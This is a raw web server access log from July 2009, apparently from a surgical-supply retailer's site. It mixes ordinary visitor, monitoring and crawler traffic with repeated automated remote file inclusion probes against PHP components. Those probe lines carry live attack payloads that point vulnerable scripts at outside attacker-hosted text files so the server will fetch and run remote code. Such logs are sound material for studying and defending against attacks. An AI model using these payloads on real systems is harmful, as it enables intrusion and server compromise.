201.232.54.48 - - [28/Jul/2009:01:45:40 -0400] "GET /logs/access_log.Q109060400%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
205.153.56.10 - - [28/Jul/2009:01:46:17 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
79.12.197.134 - - [28/Jul/2009:01:47:54 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
79.12.197.134 - - [28/Jul/2009:01:47:55 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
79.12.197.134 - - [28/Jul/2009:01:47:55 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
79.12.197.134 - - [28/Jul/2009:01:49:06 -0400] "GET /logs/access_log.Q109060800//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:01:50:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.104.15.134 - - [28/Jul/2009:01:50:39 -0400] "GET /favicon.ico HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
79.12.197.134 - - [28/Jul/2009:01:50:58 -0400] "GET /logs/access_log.Q109062500%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
79.12.197.134 - - [28/Jul/2009:01:51:28 -0400] "GET /logs/access_log.Q109060800%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
110.45.146.223 - - [28/Jul/2009:01:53:01 -0400] "GET /logs/access_log.Q109052200//logs/index.php?_REQUEST=&_REQUEST[option]=option,com_sef&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
110.45.146.223 - - [28/Jul/2009:01:53:02 -0400] "GET /logs//logs/index.php?_REQUEST=&_REQUEST[option]=option,com_sef&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
110.45.146.223 - - [28/Jul/2009:01:53:02 -0400] "GET //logs/index.php?_REQUEST=&_REQUEST[option]=option,com_sef&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
110.45.146.223 - - [28/Jul/2009:01:53:10 -0400] "GET /logs/access_log.Q109052000//logs/index.php?_REQUEST=&_REQUEST[option]=option,com_sef&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
208.113.221.110 - - [28/Jul/2009:01:54:09 -0400] "GET /logs/error_log.Q109051400%20/inurl:noticias.php?id= HTTP/1.1" 404 243 "-" "-"
208.113.221.110 - - [28/Jul/2009:01:54:09 -0400] "GET /logs/inurl:noticias.php?id= HTTP/1.1" 404 221 "-" "-"
208.113.221.110 - - [28/Jul/2009:01:54:10 -0400] "GET /inurl:noticias.php?id= HTTP/1.1" 404 216 "-" "-"
203.130.198.40 - - [28/Jul/2009:01:54:35 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:01:55:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.130.198.40 - - [28/Jul/2009:01:55:30 -0400] "GET /logs/access_log.Q109070200%20%20//include/mail.inc.php?skin_board_path=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
24.121.100.169 - - [28/Jul/2009:01:55:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:35 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:38 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:38 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:42 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL HTTP/1.1" 200 38018 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:43 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:43 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:43 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:43 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:44 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:44 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:44 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:44 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:44 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:44 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:45 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:45 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:45 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:45 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:45 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:45 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:46 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:46 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:46 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:46 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:46 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:46 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:46 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:46 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
24.121.100.169 - - [28/Jul/2009:01:55:53 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L011B924106758900317206S+M37+ENG HTTP/1.1" 200 38016 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TRAMADOL" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
195.209.236.77 - - [28/Jul/2009:01:59:46 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:59:46 -0400] "GET /?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:59:46 -0400] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 200 11334 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:59:55 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:59:55 -0400] "GET /?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:59:55 -0400] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 200 11334 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:59:56 -0400] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 200 11334 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:59:58 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:01:59:58 -0400] "GET /?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:02:00:01 -0400] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 200 11334 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:02:00:01 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:02:00:01 -0400] "GET /?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2009:02:00:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.209.236.77 - - [28/Jul/2009:02:00:25 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:02:00:36 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:02:00:36 -0400] "GET /?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:02:00:36 -0400] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 200 11334 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:02:00:45 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:02:00:45 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:02:00:51 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
195.209.236.77 - - [28/Jul/2009:02:00:59 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
65.55.105.231 - - [28/Jul/2009:02:03:03 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.231 - - [28/Jul/2009:02:03:04 -0400] "GET /logs/access_log.Q109032500 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
117.110.74.195 - - [28/Jul/2009:02:04:14 -0400] "GET /logs/access_log.Q109070200/[Script%20Path]/admin/index.php?o=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:02:04:14 -0400] "GET /[Script%20Path]/admin/index.php?o=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:02:04:14 -0400] "GET /logs/[Script%20Path]/admin/index.php?o=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:02:04:15 -0400] "GET /logs/access_log.Q109070200/[Script%20Path]/admin/index.php?o=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:02:04:15 -0400] "GET /logs/[Script%20Path]/admin/index.php?o=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:02:04:16 -0400] "GET /[Script%20Path]/admin/index.php?o=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
98.228.196.185 - - [28/Jul/2009:02:04:26 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 120309 "http://sz0147.ev.mail.comcast.net/zimbra/mail" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
98.228.196.185 - - [28/Jul/2009:02:04:26 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 120309 "http://sz0147.ev.mail.comcast.net/zimbra/mail" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
209.59.12.99 - - [28/Jul/2009:02:05:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
98.228.196.185 - - [28/Jul/2009:02:06:03 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
98.228.196.185 - - [28/Jul/2009:02:06:03 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
98.228.196.185 - - [28/Jul/2009:02:06:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
98.228.196.185 - - [28/Jul/2009:02:06:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/registration_advanced.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
94.23.205.32 - - [28/Jul/2009:02:07:27 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_mgm&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:02:07:27 -0400] "GET /logs/access_log.Q109052800/index.php?_REQUEST=&_REQUEST[option]=option,com_mgm&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:02:07:27 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_mgm&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:02:07:27 -0400] "GET /logs/access_log.Q109051300/index.php?_REQUEST=&_REQUEST[option]=option,com_mgm&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
38.99.44.103 - - [28/Jul/2009:02:09:46 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
38.99.13.118 - - [28/Jul/2009:02:09:51 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
117.110.74.195 - - [28/Jul/2009:02:09:56 -0400] "GET /errors.php?error=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:02:09:56 -0400] "GET /logs/access_log.Q109063000%20%20/errors.php?error=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:02:09:58 -0400] "GET /logs/errors.php?error=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:02:10:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
117.110.74.195 - - [28/Jul/2009:02:10:17 -0400] "GET /logs/access_log.Q109071400%20%20/errors.php?error=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.139.129 - - [28/Jul/2009:02:11:16 -0400] "GET /logs/errors.php?error=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.139.129 - - [28/Jul/2009:02:11:16 -0400] "GET /logs/access_log.Q109063000%20%20/errors.php?error=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.139.129 - - [28/Jul/2009:02:11:16 -0400] "GET /errors.php?error=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.23.205.32 - - [28/Jul/2009:02:11:28 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_simpleboard&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:02:11:28 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_simpleboard&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
